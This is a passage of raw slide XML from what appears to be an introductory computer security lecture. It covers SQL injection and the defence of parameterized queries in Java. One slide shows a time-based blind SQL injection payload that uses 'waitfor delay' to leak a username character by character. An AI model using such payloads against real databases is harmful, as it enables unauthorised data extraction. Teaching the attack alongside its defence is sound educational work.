            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4037749" y="3925669"/>
            <a:ext cx="3810851" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2328213" y="1370519"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3611826" y="393347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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824256" y="2926933"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4979276"/>
            <a:ext cx="4572000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the first letter of the username is A (65), there will be a 5 second delay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="435255"/>
            <a:ext cx="2290111" cy="1142201"/>
            <a:chOff x="457200" y="435255"/>
            <a:chExt cx="2290111" cy="1142201"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Arrow 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1346787">
              <a:off x="1909111" y="1067598"/>
              <a:ext cx="838200" cy="509858"/>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25" name="Rounded Rectangle 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="435255"/>
              <a:ext cx="1676400" cy="914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dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Actual MySQL syntax!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1396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SQL Injection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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504189" y="1418949"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260021" y="5029200"/>
            <a:ext cx="911250" cy="1260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1941128"/>
            <a:ext cx="2182611" cy="1270475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="2209800"/>
            <a:ext cx="281940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7848600" y="3322637"/>
            <a:ext cx="1" cy="1630363"/>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93338" y="1563469"/>
            <a:ext cx="3810851" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="accent2">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4037749" y="3925669"/>
            <a:ext cx="3810851" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>65 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2328213" y="1370519"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3611826" y="393347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dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824256" y="2926933"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483476" y="3850500"/>
            <a:ext cx="1485000" cy="1102500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097226" y="5337422"/>
            <a:ext cx="5029200" cy="879000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By timing responses, the attacker learns about the database one bit at a time </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23806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229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This Class: Introduction to the Four Research Cornerstones of Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2209800"/>
            <a:ext cx="8077200" cy="3581400"/>
            <a:chOff x="609600" y="1828800"/>
            <a:chExt cx="8077200" cy="3581400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="1828800"/>
              <a:ext cx="4419600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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r>
                <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFE"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Software Security</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4246341" y="1828800"/>
              <a:ext cx="4419600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:alpha val="6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t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFE"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Network Security</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="3276600"/>
              <a:ext cx="4419600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:alpha val="76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b" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFE"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>OS Security</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4267200" y="3276600"/>
              <a:ext cx="4419600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:alpha val="59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b" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFE"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Cryptography</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4061376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Parameterized Queries with Bound Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175297" y="1600200"/>
            <a:ext cx="6530303" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setUpAndExecPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>conn.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>UPDATE players SET name = ?, score = ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>active = ? WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jerseyNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = ?"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>//automatically sanitizes and adds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>quotes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, "Smith, Steve"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>42)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
